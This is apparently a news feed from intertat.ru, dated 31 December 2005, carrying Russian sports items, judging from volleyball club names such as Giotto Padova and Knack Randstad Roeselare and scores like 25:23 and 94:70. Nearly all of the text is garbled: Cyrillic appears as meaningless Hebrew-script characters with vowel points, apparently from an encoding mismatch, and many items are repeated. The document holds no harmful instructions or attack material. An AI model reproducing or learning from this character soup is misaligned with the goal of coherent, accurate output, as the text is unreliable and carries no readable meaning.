׳ םֱֱֵַּ. נֵֵׂ׀ֱׂ׳ֱ ֵֽֽֿׂ ֱֵֽװ 7 ֱ׃ֿ׳. ק ׀ֿ־ִֵֵּ״־ֹֻ ַֿ־ֱֻ ׀ִּֿֿׂײֹװ׃ׁ ױײֵ ־ֱ ֱֱֶֹֻׂ־׃ֻֽֿ ֻֿ־װֹ־ֵ־װֵ.ק כֹ׃ּֿ׳ִֿ׃ֻ ׀ִֵֵֿװ ֽ־ַֿֿ ־ֿ׳ֹֻֿ׳http://intertat.ru/index.php?id=80153מֱ װֵׂ־ֹֿׂ׳ֿ־ ׃ֲֿׂ ׳ כֹ׃ּֿ׳ִֿ׃ֻ, ֻֿװֽֿׂ װֱֳִֹֹֿׂ־־ֿ ֿװֻׂ׳ֱֵװ «כֱֽבת», ׳׃װױ׀ְֱֹ ׳ ׀ֵׂ׳ֽֿ ִֹ׳ֹֹֿ־ֵ ֵֽ׀ֹֿ־ֱװֱ עֿ׃׃ֹֹ, ֿ׃־ֿ׳־ױְ ֱ׃װ״ ׀ִַֿֿװֿ׳ֹֻ ֻ ׃ֵֿ־ױ, ׀ִֵֵֿװ ֻּֿֿֿ 50 ֶױװֲֹּֿ׃װֿ׳.Sat, 31 Dec 2005 10:58:19 +0300מֱ װֵׂ־ֹֿׂ׳ֿ־ ׃ֲֿׂ ׳ כֹ׃ּֿ׳ִֿ׃ֻ, ֻֿװֽֿׂ װֱֳִֹֹֿׂ־־ֿ ֿװֻׂ׳ֱֵװ «כֱֽבת», ׳׃װױ׀ְֱֹ ׳ ׀ֵׂ׳ֽֿ ִֹ׳ֹֹֿ־ֵ ֵֽ׀ֹֿ־ֱװֱ עֿ׃׃ֹֹ, ֿ׃־ֿ׳־ױְ ֱ׃װ״ ׀ִַֿֿװֿ׳ֹֻ ֻ ׃ֵֿ־ױ, ׀ִֵֵֿװ ֻּֿֿֿ 50 ֶױװֲֹּֿ׃װֿ׳.ףִֵֹׂ װֵָ, ֻװֿ ֿװ׀ֱׂ׳ֹװ׃ׁ ׳ ׃ִֵׂ־ֵַֿׂ״ֵ, ֹ ׀ֱֵָֹׂ׳ֵֹ ׳ «כֱֽבת» ־ֱ ׀ֿׂ׃ֽֿװׂ ׀ּֿױֱֹװ־ֹֹֻ ֱִּֽֿ׳׃ֻֿ «הֱֹֹ» קֱִֹֹּֽׂ צ׀ּױ ֹ ֲׂ־ֳֹֻֿ «י׃ֻׂ» מֱֹֻּֿ צֿ׃ֱ־. הֿ ׀ֿ׃ִֵּ־ֵַֿ ׳ֵֵֽׂ־ֹ ֱַּ׳־ װֵׂ־ֵׂ ֱ׳װֱֿ׳ֳִֵֿ׳ אֹׂ חֱֱֵ׳ ׃װֱֱּׂ׃ׁ ֲִָֹֿֿװ׃ׁ ֿׂ׃׃ֹ׃ֹֹֻֽ ֱַֹֹֻֽֿׂ.«־ײֵ» ׳ ־ֿ׳ֽֿ ִַֿױ ױײֵ ֱַֹׂװ״ ־ֵ ֲױִֵװ?http://intertat.ru/index.php?id=80152ק 2006 ִַֿױ ײֵ־׃ֱֻׁ ֱֻֽֿ־ֱִ «־ײֵ» ױײֵ ־ֵ ׃ֱֵַׂװ ׳ ֵֽ׀ֹֿ־ֱװֵ ֿׂ׃׃ֹ׃ֻֿ ֱֲ׃ֵֻװֲּֿ״־ֿ ׃ױ׀ֵַֹֹּׂ. פֱֻ ֱׁ׳ֹֹּ ׳ ֱֱֻ־׃ֻֽֿ ֻּױֲֵ ׀ִֵׂ׃װֱ׳ֹװֵּֽׁ ׀ֵׂ׃׃.׃׀ֿׂװSat, 31 Dec 2005 10:54:25 +0300ק 2006 ִַֿױ ײֵ־׃ֱֻׁ ֱֻֽֿ־ֱִ «־ײֵ» ױײֵ ־ֵ ׃ֱֵַׂװ ׳ ֵֽ׀ֹֿ־ֱװֵ ֿׂ׃׃ֹ׃ֻֿ ֱֲ׃ֵֻװֲּֿ״־ֿ ׃ױ׀ֵַֹֹּׂ. פֱֻ ֱׁ׳ֹֹּ ׳ ֱֱֻ־׃ֻֽֿ ֻּױֲֵ ׀ִֵׂ׃װֱ׳ֹװֵּֽׁ ׀ֵׂ׃׃.ק ֱֲִֵֵֻׂ װֱֻ ֹ ־ֵ ֵֹֹּׂ׃״ ֶֹ־ֱ־׃ֿ׳ֵ ׀ֲֵּֽֿׂ ײֵ־׃ַֻֿֿ ֻּױֱֲ ֹ ׀ֱֻׂװֵֹ׃ֹֻ ׳׃ֵ ׳ִֵױֵֹ ַֹֹֻֿׂ ֱֻֽֿ־ִ ֿװ׀ֱׂ׳ֹֹּ׃״ ׳ ִׂױֵַֹ ֱִַֿֿׂ, ֻױֱִ ָֹ ױײֵ ֱִ׳־ֿ ױ׃ֵֹּ־־ֿ ֱ׳ֱֹּ ֵֽ׃װ־ֵ װֵׂ־ֵׂ. מֱ 10 ׁ־׳ֱׁׂ ׀ֿ ֱֵֻּ־ְֱִׂ ׃ױ׀ֵַֹֹּׂ «־ײֵ» ִּֿײ־ֱ ֱַֹׂװ״ ֱִֽֿ־ֹ ֱֽװ ׃ ׀ֹװֵׂ׃ֻֿ «גֱּװֹ׃ֻֿ ׳ִֵֿ». כװֿ ׳ִֵװ ־ֱ ׀ֱִֻּֿױ, ֱַּ׳־ װֵׂ־ֵׂ ֱֻֽֿ־ִ כֵּֿֿׂ׳ ־ֵ ־ֱֵװ. כֱֻ ֹ ־ֵ ׀ִֵׂ׃װֱ׳ֵּׁװ ֿ־ ׃׳ְֿ ֱִּ״־ֵױְ ֱֻׂ״ֵׂױ ׳ ֱֻֽֿ־ִֵ.«עֱֵֻװֱ» ׀ֿ׀ּֿ־ֵׁװ ׃ֿ׃װֱ׳http://intertat.ru/index.php?id=80151כֱֱ־׃ֱֻׁ «עֱֵֻװֱ», ֱ־ְֱֱֹֽׁ ׀ֿ׃ִֵּ־ֵֵ ֵֽ׃װֿ ׳ ֱ׀ֱִ־ֿ ַׂױ׀׀ֵ ׳׃ֵ ַֹֹּ ֵֽ׀ֹֿ־ֱװֱ עֿ׃׃ֹֹ, ־ֵ׃ֽֿװׁׂ ־ֱ ֶֹ־ֱ־׃ֿ׳ֵ ׀ֲֵּֽֿׂ, ֱׁ׳ֱֹּ װֵָׂ ־ֿ׳ָ ַֹֻֿֿׂ׳.׃׀ֿׂװSat, 31 Dec 2005 10:52:15 +0300כֱֱ־׃ֱֻׁ «עֱֵֻװֱ», ֱ־ְֱֱֹֽׁ ׀ֿ׃ִֵּ־ֵֵ ֵֽ׃װֿ ׳ ֱ׀ֱִ־ֿ ַׂױ׀׀ֵ ׳׃ֵ ַֹֹּ ֵֽ׀ֹֿ־ֱװֱ עֿ׃׃ֹֹ, ־ֵ׃ֽֿװׁׂ ־ֱ ֶֹ־ֱ־׃ֿ׳ֵ ׀ֲֵּֽֿׂ, ֱׁ׳ֱֹּ װֵָׂ ־ֿ׳ָ ַֹֻֿֿׂ׳.עֵ״ ִֵֹװ ֿ ־ֱ׀ְֱֱִֵֽ בֵֻּ׃ֵֵ לױֻ״ׁ־ֿ׳ֵ ֹ ֹװֹ־׃ַֻֿֿ ףכב-«תֱֱֱֲֻּ״ֱֳ», ׀ּֿױֱֹװ־ֵֹֻ קֹװֱֹֹּ בֵָֽֿׂ׳ֵ, ׳ֿ׃׀ֹװֱ־־ֵֹֻ ֱֻׂ׃־ֿׁׂ׃ַֻֿֿ «ו־ֹ׃ֵׁ», ׳ ׀ֿ׃ִֵּ־ֵֵ ׳ֵֽׁׂ ֱַֹׂ׳ֵֽ ֱ «ףֱׁ־» ֹ בֱֱֲֻ־ֱ, ֱ װֱֻײֵ ׀ּֿױֱֹװ־ֵֹֻ םֱֵֹֻּ ףֱ־ֲִֵַׂ, ֵַֹֻֿׂ ׃ֲֿׂ־ֿ ףב, ִֹֿׂ׳ֵַֿ׃ׁ ׳ ׳ֳֵֹֹ, ֱ ׳ ֱִ־־ֵֿ ׳ֵֽׁׂ ־ֱִֵָֽֿׁ׃ׁ ׳ כֱֱ־ֹ ׳ ֱֻֽֿ־ִֹֿׂ׳ֵֻ ׀ֿ ׃ּױײֲֵ־ֽ ֱִֵּֽ ֹ ֹׁ׳ֹ׳ֵֽ ײֱֵּ־ֵֹ ֱַֹׂװ״ ֱ «עֱֵֻװױ».«הֹ־ֱֽֿ-פֱװװֱׂ־׃ֱַ» ֹּ״ ֵװ׳ֵׂװֵֿhttp://intertat.ru/index.php?id=80150כֱֱ־׃ֵֻֿ «הֹ־ֱֽֿ-פֱװװֱׂ־׃ֱַ» ֱ־ּֿׁ ֵװ׳ֵׂװֵֿ ֵֽ׃װֿ ־ֱ װֱֳִֹֹֿׂ־־ֽֿ ֿׂײִֵ׃װ׳ֵ־׃ֻֽֿ װױׂ־ֵֹׂ ׳ גֵּ״ַֹֹ.׃׀ֿׂװSat, 31 Dec 2005 10:50:01 +0300כֱֱ־׃ֵֻֿ «הֹ־ֱֽֿ-פֱװװֱׂ־׃ֱַ» ֱ־ּֿׁ ֵװ׳ֵׂװֵֿ ֵֽ׃װֿ ־ֱ װֱֳִֹֹֿׂ־־ֽֿ ֿׂײִֵ׃װ׳ֵ־׃ֻֽֿ װױׂ־ֵֹׂ ׳ גֵּ״ַֹֹ.הֿ׳ּֿ״־ֿ ױֱִ־ֿ ׃ֱַׂ׳ ׳ ַׂױ׀׀ֿ׳ֽֿ װױׂ־ֵֹׂ, ֱֱֻ־ֳ ׃ ׀ֵׂ׳ַֿֿ ֵֽ׃װֱ ׳ֹּ ׃ֱׂױ ׳ ׀ּֿױֶֹ־ֱּ. ץ׃װױ׀ֹ׳ ׳ ׀ּֿױֶֹ־ֱֵּ ֲױִױֵֽױ ׀ֲִֵֹֿװְֵּ װױׂ־ֱֹׂ - ֹװֱּ״ׁ־׃ֻֿ ֱֻֽֿ־ִֵ «Giotto Padova», ױ ֻֿװֿֿׂ ־ֱֹ ֵֹֻּֽׁ ׳ ַׂױ׀׀ֿ׳ֽֿ װױׂ־ֵֹׂ ׳ֱַֹֹּׂ, ׳ ֱֽװֵ ֱ װֵׂװ״ֵ ֵֽ׃װֿ ֱֱֻ־ֳ ׳ ֵװֵָׂ ׀ֱׂװָֹׁ װֱֻ ֹ ־ֵ ׃ַֹּֽֿ ׳ׁװ״ ׳ֵָׂ ־ֱִ ֵָֿׁ׳ֱֹֽ ׀ֱִֹֻּֿ - ׳ֲֵֹּּֿֿ׃װֱֽ «Knack Randstad Roeselare».קֱַֹׂ׳ ׀ֵׂ׳ױְ ׀ֱׂװְֹ 25:23, ֱֱֻ־ֳ ױ׃װױ׀ֹֹּ ׳ ִ׳ױָ ׃ֵװֱָ ׀ִִֿׁׂ - 18:25 ֹ 15:25. ק ֵװ׳ֵׂװֿ ׀ֱׂװֹֹ ֱ׳ֱֱּׁ׃״ ױ׀ֿׂ־ֱׁ ֲֿׂ״ֱֲ. ףֵװ ׀ֿ ֵֵ ִָֿױ ־ֵ׃ֻּֿ״ֻֿ ֱׂ ֲּ ֱׂ׳־ֽ - 6:6, 13:13, 19:19, ־ֿ ׳ ֻֿ־ֳֵ ׀ֱׂװֹֹ ֲֵּ״ֳַֹ ׳ֹּׁ ׳ֵָׂ - 25:23.עִֵֻֿׂ עֿ׃׃ֹֹ - ֻ מֿ׳ֽֿױ ִַֿױ!http://intertat.ru/index.php?id=80148הֵ׳ׁװ״ ֵֹֻּֽֿװֿׂ׳ ׀ֵּֿׂװֱֵּ ־ֱִ ןֵׂ־ֲױַׂ׃ֹֻֽ װֱֻׂװֽֿ ִֵּֽֿ״ ׃ֱֵּֽֿװֱ ׃ ֵֻּװֵֹׂ׃ֹֻֽ ִ׳ֱַֹװֵֵּֽ, ׀ֿ׃װֵֿׂ־־ֱׁ ֹ ױ׀ֱׂ׳ֱֵּֽׁׁ ׀ֿ ֱִֹֿׂ ׳ֿ׃׀ֹװֱ־־ֹֻֽֿ דֵ־װֱׂ ִֵװ׃ֻֿ-ְ־ֵֿ׃ַֻֿֿ װֵָ־ֵֹ׃ַֻֿֿ װ׳ֵֿׂ׃װ׳ֱ מֿ׳ֿ-ףֱ׳ֹ־ֿ׳׃ַֻֿֿ ֱֿׂ־ֱ כֱֱ־ֹ, ׃װױִֵ־װֽֿ ׳װַֿֿֿׂ ֻױׂ׃ֱ ֱֶֻױּ״װֵװֱ ׃ֱֵּֽֿװֿ׃װֵֿׂ־ֹׁ כחפץ ףװֱ־ֹ׃ֱּ׳ֽֿ ‏ֵֵֹֽׂ׃ֿ׳ֽ.׃׀ֿׂװSat, 31 Dec 2005 10:42:47 +0300הֵ׳ׁװ״ ֵֹֻּֽֿװֿׂ׳ ׀ֵּֿׂװֱֵּ ־ֱִ ןֵׂ־ֲױַׂ׃ֹֻֽ װֱֻׂװֽֿ ִֵּֽֿ״ ׃ֱֵּֽֿװֱ ׃ ֵֻּװֵֹׂ׃ֹֻֽ ִ׳ֱַֹװֵֵּֽ, ׀ֿ׃װֵֿׂ־־ֱׁ ֹ ױ׀ֱׂ׳ֱֵּֽׁׁ ׀ֿ ֱִֹֿׂ ׳ֿ׃׀ֹװֱ־־ֹֻֽֿ דֵ־װֱׂ ִֵװ׃ֻֿ-ְ־ֵֿ׃ַֻֿֿ װֵָ־ֵֹ׃ַֻֿֿ װ׳ֵֿׂ׃װ׳ֱ מֿ׳ֿ-ףֱ׳ֹ־ֿ׳׃ַֻֿֿ ֱֿׂ־ֱ כֱֱ־ֹ, ׃װױִֵ־װֽֿ ׳װַֿֿֿׂ ֻױׂ׃ֱ ֱֶֻױּ״װֵװֱ ׃ֱֵּֽֿװֿ׃װֵֿׂ־ֹׁ כחפץ ףװֱ־ֹ׃ֱּ׳ֽֿ ‏ֵֵֹֽׂ׃ֿ׳ֽ.ף׀ֿׂװֹ׳־ֵ ֹֻֽֿ׃׃ֱׂ דֵ־װֱּׂ״־ַֿֿ ֱֻּֿׂױֱֲ ֹֽ. ק.‏ֱֻּֿ׳ֱ ֱֶֹֻ׃ֹֿׂ׳ֱֹּ װֿ ִֵֻֿׂׂ־ֵֿ ִֿ׃װֹײֵ־ֵֹ 17-ֵּװ־ֵַֿ װֱֱּ־װֹּ׳ַֿֿ ְ־ֹֿ, ֻֿװֵֿֿׂ ׳ ׀ּֿװֱֿׂ ֱֱׂ ׀ֵׂ׳ֱֵװ ֱֳֶֹֹּֿ״־ ִֵֻֿׂׂ ׃װֱׂ־, ׀ֹׂ־ֱִֵּײֱֹ ׃׀ֿׂװ׃ֵֽ־ױ ֹ ףֱ־ֻװ-נֵװֲֵׂױֱַׂ.י־װֵֵׂ׃־ֿ, װֿ װֿ ױײֵ ׳װֵֿֿׂ ִֵֻֿׂׂ־ֵֿ ִֿ׃װֹײֵ־ֵֹ ױֵ־ֹֻֿ׳ ֹ׳ֵ׃װ־ַֿֿ ֿׂ׃׃ֹ׃ַֻֿֿ װֵׂ־ֱֵׂ קֵׁ׃ֱּ׳ֱ פֹװּֿ׳ֱ ׳ ױִֵָֽֿׁ ִַֿױ ֹ ׀ׁװ״ִֵ׃ׁװ ׀ׁװֵֿ ֱ ֵַֿ ִַּֿױְ װֵׂ־ֵׂ׃ֻױְ ֱֻׂ״ֵׂױ ׳ ֱ׳ֱִֵֹּֽֿ״־ֽֿ ׃׀ֿׂװֵ.מֱ ִֿ־ֽֿ ֱֽ׃װֵׂ׃װ׳ֵhttp://intertat.ru/index.php?id=80147גֱ׃ֵֻװֲֹּֿ׃װ ֱֱֻ־׃ַֻֿֿ «ץמיכףֱ» ׳ ֱֱָֻֽׂ כױֱֲֻ עֿ׃׃ֹֹ ׳ ׀ׁװ־ֳֹױ ׀ֿׂ׳ֵֹּ ־ֱ ׀ֱִֵֻּֿ ױֲֵ־ֿ-װֵׂ־ֹֿׂ׳ֿ־ֿ ֱֲ ׳ קֱ׃ֹּ״ֵ׳ֿ ׀ֵׂ׳ ֱֽװ 1/8 ֶֹ־ֱֱּ ׃ «פֵֽ׀ֽֿ-ףץקת» ֹ עֵ׳ִ ֹ ױ׳ֵֵׂ־־ֿ ׀ֲִֵֹֹּֿ - 94:70 (28:17, 22:22, 17:17, 27:14).׃׀ֿׂװSat, 31 Dec 2005 10:39:21 +0300גֱ׃ֵֻװֲֹּֿ׃װ ֱֱֻ־׃ַֻֿֿ «ץמיכףֱ» ׳ ֱֱָֻֽׂ כױֱֲֻ עֿ׃׃ֹֹ ׳ ׀ׁװ־ֳֹױ ׀ֿׂ׳ֵֹּ ־ֱ ׀ֱִֵֻּֿ ױֲֵ־ֿ-װֵׂ־ֹֿׂ׳ֿ־ֿ ֱֲ ׳ קֱ׃ֹּ״ֵ׳ֿ ׀ֵׂ׳ ֱֽװ 1/8 ֶֹ־ֱֱּ ׃ «פֵֽ׀ֽֿ-ףץקת» ֹ עֵ׳ִ ֹ ױ׳ֵֵׂ־־ֿ ׀ֲִֵֹֹּֿ - 94:70 (28:17, 22:22, 17:17, 27:14).ףֿ׀ֵׂ־ֹֻ ױ ֱֱֻ־׃ַֻֿֿ ֻּױֱֲ, ֻֿ־ֵ־ֿ, ֲּ ־ֵ ֱָװֹ ֱֻֻֿ. מֿ ׳ ֻױֲֻֿ׳ָ װױׂ־ֱָֹׂ ׀ֿׂװֹ׳־ֹֻֿ׳ ־ֵ ׳ְֱֲֹׂװ, ֱ ֱׂ ֱֻֽֿ־ֱִ ֹ ־ֲֵּֿ״ַֿֿ ֱִַֻֿֿׂ ף׳ִֵּֿׂ׳׃ֻֿ ֱֲּֿ׃װֹ ֱִּֿ ִֿ 1/8 ֶֹ־ֱֱּ, ־ֱֹװ ׃ ־ֵ ־ֱִֿ ׃ֹװֱװ״׃ׁ.ק ׃װֱׂװֿ׳ֿ ׀ׁװֵֵֻׂ «ץמיכףֱ» ־ֱ ׀ֱִֻּֿױ ׳ֹּ פֿ׀ֿֿׂ׳, װֱֲֵַֽֿׂ׃, ףֱֵּֽֿ־ֻֿ, לֱ׳ֹׂ־ֿ׳ֹ ֹ םְׂ׃ֵ׀׀. י ױײֵ ׀ֿ׃ֵּ ׀ֵׂ׳ֿ ֵװ׳ֵׂװֹ ֱֱֻ־ֳ ֵֹֹּׂ ׳ֿ׀ֿׂ׃ ֿ ׀ֲִֵֹֿװֵֵּ, ׳ֱַֹׂ׳ ִֵ׃ׁװֹֹֽ־ױװֻױ ׃ ׀ֵֹֽׂױֵ׃װ׳ֽֿ ׳ ִֹֿ־־ֱֱֳִװ״ ֻֿֿ׳.נֿׂ׳ִֵׁ ׃ּֿ׳־ֿ ׳ װֵׂ־ֹֿׂ׳ֿ־ֽֿ ֵׂײֵֹֽ ִ׳ֵ ׀ֿ׃ִֵּױְָֹ ֵװ׳ֵׂװֹ, ֹ ־ֵ ׃װֱֱׁׂ׃״ ־ֵ ׃ֹֻּֽֿ ַֹֿֿׂװ״ ׃ֿ׀ֵׂ־ֱֹֻ, ֵָֿׁ׳ֱ ׀ֱִֹֻּֿ ׳ ֵװ׳ֵׂװֽֿ ׀ִֵֵֹֿׂ ׳־ֿ׳״ ־ֱ׀ֽֿ־ֹֹּ ֱֲ׃ֵֻװֲֹּֿ׃װֱֽ ֹ עֵ׳ִ, «ֻװֿ ֵ׃װ״ ֻװֿ» ׳ ֿׂ׃׃ֹ׃ֻֽֿ ֱֲ׃ֵֻװֲֵּֿ.מֱ ִֵֻֿׂ׃װ״ ֵׂױּ״װֱװֹ׳־ֿ ױ ֱֱֻ־ֳֵ׳ ׃ֱַּׂ םְׂ׃ֵ׀׀, ־ֱֱֲׂ׳ֹ 26 ֻֿֿ׳ - ֱִ׳־ֿ ֿ־ װֱֻ ־ֵ ֲֹּ׃װֱּ ֵׂױּ״װֱװֹ׳־ֿ׃װ״ְ. מֱ ׃ֵװױ װֱֲֵַֽֿׂ׃ֱ 17 ֻֿֿ׳, ֱ גֵ׃װ, ױ ֻֿװַֿֿֿׂ ־ֱ׀ֽֿ־ֱֹּ ֿ ׃ֲֵֵ ׃װֱֱׁׂ װֱׂ׳ֱֽ, ־ֱֱֲּׂ 16 ֻֿֿ׳. ק ׃ֿ׃װֱ׳ֵ ַֿ׃װֵ ֲּֿ״ֵ ִׂױַָֹ ־ֱֱֲֹּׂ ‏ֹײֿ׳ (26) ֹ גֵֵֹׂ־ (15). הֱֲֿ׳ֹֽ ֵֵ, װֿ ַֿ׃װֹ ׳ֱַֹֹּׂ ֲֿׂ״ֲױ ׀ִֿ ֹװֱֹֽ - 36 ׀ֲִֿֿֿׂ׳ ׀ֿׂװֹ׳ 29 ױ ֱֱֻ־ֳֵ׳.6 ׁ־׳ֱׁׂ «ץמיכף» ׀ֿׂ׳ִֵֵװ ֿװ׳ֵװ־ ֱֽװ ׳ עֵ׳ִֵ, ֱ ׳ ֵװ׳ֵׂװ״ֶֹ־ֱֵּ ֱֱֻ־ֳ, ֱ ׳ ָֹ ׀ֲִֵֵֿ ־ֹֻװֿ ־ֵ ׃ֽֿ־ֵ׳ֱֵװ׃ׁ, ׃ְֱַׂװ ׃ ִֹ־ֱֽֿ׳ֱֳֹֽ ףֱ־ֻװ-נֵװֲֵׂױֱַׂ.מֹ״ׁ ֱֹֹּּ «ֱֲׂ׃ֿ׳» ׳װַֿֿֿׂ ֵֽ׃װֱhttp://intertat.ru/index.php?id=80146מֱֱֻ־ױ־ֵ מֿ׳ַֿֿ ֱִַֿ ֵָֹֻֻֿ׃װ «בֻ גֱׂ׃ֱ» ׃ֱַֹּׂ ׳־ֹ״ְ ׳ ַֿ׃װָׁ ׃ «ֳֹֹֹּֽֿ־ֱֵֹֽׂ» ֹ פ׳ֵֹׂ, ׀ֿׂ׳ִֹֿ׳ֹֹֽ ׀ֿ׃ִֵּ־ֹ ֱֽװ ־ֱ ׃׳ֵֽֿ ּ״ִױ - 2:2.׃׀ֿׂװSat, 31 Dec 2005 10:07:25 +0300מֱֱֻ־ױ־ֵ מֿ׳ַֿֿ ֱִַֿ ֵָֹֻֻֿ׃װ «בֻ גֱׂ׃ֱ» ׃ֱַֹּׂ ׳־ֹ״ְ ׳ ַֿ׃װָׁ ׃ «ֳֹֹֹּֽֿ־ֱֵֹֽׂ» ֹ פ׳ֵֹׂ, ׀ֿׂ׳ִֹֿ׳ֹֹֽ ׀ֿ׃ִֵּ־ֹ ֱֽװ ־ֱ ׃׳ֵֽֿ ּ״ִױ - 2:2.«גֱׂ׃» ־ֱֱֹּ ַֿ׃װֵ׳ֿ ֱֽװ ִֿ׳ּֿ״־ֿ ֱֻװֹ׳־ֿ, ֹ גְֱִֻֿ׳, ױ ֻֿװַֿֿֿׂ ׀ֱֵֵֿׂׂװ׃ׁ ֵַּֿ׳ֵֿ ױװ״ֵ, ױײֵ ׳ ־ֱֱֵּ ׳װֿֿׂ ֹֽ־ױװ ֱֽװֱ ׃ ׳׳ֵֵׂ־־ַֿֿ ׀ֱ׃ֱ ‏ױ׀ֹ־ֱ ֿװֻּׂ ׃ֵװ. טֵֹֻֻֿ׃װ טכ םקה, ׀ֿׂ׳ִֹֿ׳ֵֹ ׀ֿ׃ִֵּ־ֹ ֱֽװ ־ֱ ִֵּֿ׳ֿ ֱֵׂ־ֵ ׳ פ׳ֵֹׂ, ֱ ׳ 2006 ִַֿױ ֿ־ֹ ױײֵ ֲױִױװ ֵָֿׁ׳ֱֹֽ ִֵּֿ׳ֿ ֱֵׂ־ ׳ נִּֿֿ״׃ֵֻ, ֿװֱַֹּׂ׃״ ֵֵ ׳ ׀ֵׂ׳ֽֿ ׀ִֵֵֹֿׂ, ֹ׃׀ּֿ״ֿ׳ֱ׳ ֹ׃ֵּ־־ֵֿ ׀ֵֹֽׂױֵ׃װ׳ֿ - ױ «בֻ גֱׂ׃ֱ» ִ׳ֵ ֹֽ־ױװ װֱֱֶׂ ֱ ׀ִֿ־ֿײֻױ ׀ּֿױֹּ ַֹֻּֿ׀ֵׂ וֵֵֽׂ־ֻֿ. ב ׃׀ױ׃װׁ ִ׳ֵ ֹֽ־ױװ ֵָֿׁ׳ֱ ּ״ֱִ ׳ֹּ ױײֵ ׳׀ִֵֵׂ ׀ֿ׃ֵּ ֲֿׂ׃ֱֻ תֵ׳ֱָֹ־ֱ.קֿ ׳װֽֿֿׂ ׀ִֵֵֹֿׂ ־ֱ ּ״ִױ ֱּ ֿײֵ׃װֵֿ־־ֱׁ ֲֿׂ״ֱֲ, ֹ ׳ ִֿ־ֿ ֹ ׃װֵֻ ֹֹּ־ְְ ַׂױֲֿ׃װ״ ׳ ׀ֿׂװֹ׳ֿ׃װֿׁ־ֹֹ ׃ נֵׂ׳ֹ־ֽ ׀ֿׁׂ׳ֹּ קֵֹֻּֿ׳. ק ֹװֵַֿ «ֱֲׂ׃» ׀ּֿױֹּ ִ׳ֵ ֹֽ־ױװ װֱֱֶׂ, ֱ ֵַֿ ׳ֱֹ׳ֹ - ֵװֵׂ. װֹֽ ױֱִֵּ־ֵֹֽ ֹ ׳ֿ׃׀ּֿ״ֿ׳ֱֹּ׃״ ֱֱֻ־ֳ, ױ ֻֿװָֿׂ ֱ׳ֵֹּׂ ֱװֱֻױ װֿ־ֽ ֲֿׂ׃ֻֽֿ ףװֵ׀ֱ־ֿ׳.ק װֵׂװ״ֵֽ ׀ִֵֵֹֿׂ «ֱֲׂ׃» ִֿ־ֱײִ ֱֱֹֻּֿ׃״ ־ֱ ׀ֱִֵֻּֿ ׳װֵֽֿׂ ׀ֿׂװֹ׳ ׀ׁװֵֹֻׂ ׃ֿ׀ֵׂ־ֹֻֿ׳: ׃־ֱֱֱּ ֱֲֹׂװׂ ױֱִֹּּ ןֲױָֿ׳ֱ ֱ ֱװֱֻױ ֱַֹֻֿׂ, ־ֵ ׳ְֱִֵֵַּֿ ֱֲֿ, ֱ ֱװֵֽ ֱ װֻּֿֿ ׃ֿ׀ֵׂ־ֱֹֻ ְֻֻּֿ ֿװ׀ֱׂ׳ֹּ ־ֱ ׃ֱֵֻֻֽױ װֱֶׂ־ֹֻֿ׳ ‏ױ׀ֹ־ֱ. מֿ «בֻ גֱׂ׃» ׳׃װּֿׁ», ָֿװׁ ֵָֹֻֻֿ׃װ ֹ פ׳ֵֹׂ ׃װֱֱֹּׂ׃״ ֹֿ ׳׃ֵָ ׃ֹּ. ק ֿ׳ֵׂװֱֵֽ ׃ֵװ ׃ֱָֿׂ־ֹּ׃ׁ.מֱֱֲׂ׳ 67 ֻֿֿ׳ «ֱֲׂ׃» ױ׃װױ׀ֹֹּ ׳װֿׂױְ ׃װֻֿׂױ ׳ װױׂ־ֹׂ־ֿ װֱֲֳֵֹּ ֽֿ׃ֻֽֿױ «ב׳ֱ־ֱִַׂױ», ױ ֻֿװַֿֿֿׂ ־ֱ ִֿ־ֿ ֻֿֿ ֲּֿ״ֵ.3 ׁ־׳ֱׁׂ ־ֱ ּ״ִױ «פֱװ־ֵֶװ״-ֱֵׂ־» ֵֽײִױ ׃ֲֿֿ ׃ְֱַׂװ «בֻ גֱׂ׃» ֹ «מֵֶװֵָֹֹֻֽ», ֻֿװֿׂ ֱׂ׃׀ּֿֿײֹּ׃ׁ ־ֱ ֵװׂ־ֱֱֳִװֽֿ ֵֽ׃װֵ.ףֲֿׂ־ֱׁ עֿ׃׃ֹֹ - ֲֵ ׀ֱֿׂײֵ־ֹhttp://intertat.ru/index.php?id=80145נִּֿֿׂײֱֵװ ֱִֿׂ׳ֱװ״ ִֵּֽֿֿײ־ֱׁ ׃ֲֿׂ־ֱׁ עֿ׃׃ֹֹ, ׳ֱַֹׂ׳ֱׁ ־ֱ ֵֽ׀ֹֿ־ֱװֵ ֱֹֽׂ ׀ֿ ְֵָֻֻֿ ׳ כֱ־ֱִֵ ױײֵ װֵׂװֹ ֱֽװ ׀ִִֿׁׂ. ןִֵֵׂ־ֿ ֵֵ «ײֵׂװ׳ֿ» ׃װֱֱּ ׃ֲֿׂ־ֱׁ לֱװ׳ֹֹ.׃׀ֿׂװSat, 31 Dec 2005 10:01:55 +0300נִּֿֿׂײֱֵװ ֱִֿׂ׳ֱװ״ ִֵּֽֿֿײ־ֱׁ ׃ֲֿׂ־ֱׁ עֿ׃׃ֹֹ, ׳ֱַֹׂ׳ֱׁ ־ֱ ֵֽ׀ֹֿ־ֱװֵ ֱֹֽׂ ׀ֿ ְֵָֻֻֿ ׳ כֱ־ֱִֵ ױײֵ װֵׂװֹ ֱֽװ ׀ִִֿׁׂ. ןִֵֵׂ־ֿ ֵֵ «ײֵׂװ׳ֿ» ׃װֱֱּ ׃ֲֿׂ־ֱׁ לֱװ׳ֹֹ.תֱֲֿׂ׃ֹ׳ ׀ֿ׃ֵּ ֵװֵָׂ ֹֽ־ױװ ַֹׂ ִ׳ֵ ֱֲ, ֿׂ׃׃ֹׁ־ֵ ׀ֱֻׂװֵֹ׃ֹֻ ׃־ֹּׁ ׳ֿ׀ֿׂ׃ ֿ ׀ֲִֵֹֿװֵֵּ. י ׃װֹּֿֿ װּֿ״ֻֿ ֱּװֱֽ ׳ ׃ִֵֵֹׂ־ֵ ַֹׂ ֿװֻ׳ֹװֱװ״ ִֿ־ױ ֱֲױ, ֹ׃׀ּֿ״ֿ׳ֱ׳ ױֱִֵּ־ֵֹ ׳ ׃ֲֿׂ־ֿ עֿ׃׃ֹֹ, ֱֻֻ ־ֱֹ ׃ֿֿװֵֵ׃װ׳ֵ־־ֹֹֻ, ׃ִֵֹׂ ֻֿװָֿׂ ֱַֹֹּׂ ֹ װֹׂ ֵָֹֻֻֿ׃װֱ ֹ «בֻ גֱׂ׃ֱ», ׳ֿ׃׃װֱ־ֿ׳ֹֹּ ׃ֿֿװ־ֵֿ־ֵֹ ׳ ׃ֵװֵ. ק ֹװֵַֿ ׀ֱֲִֵֿ 3:1 ֹ ֵ׃װ״ 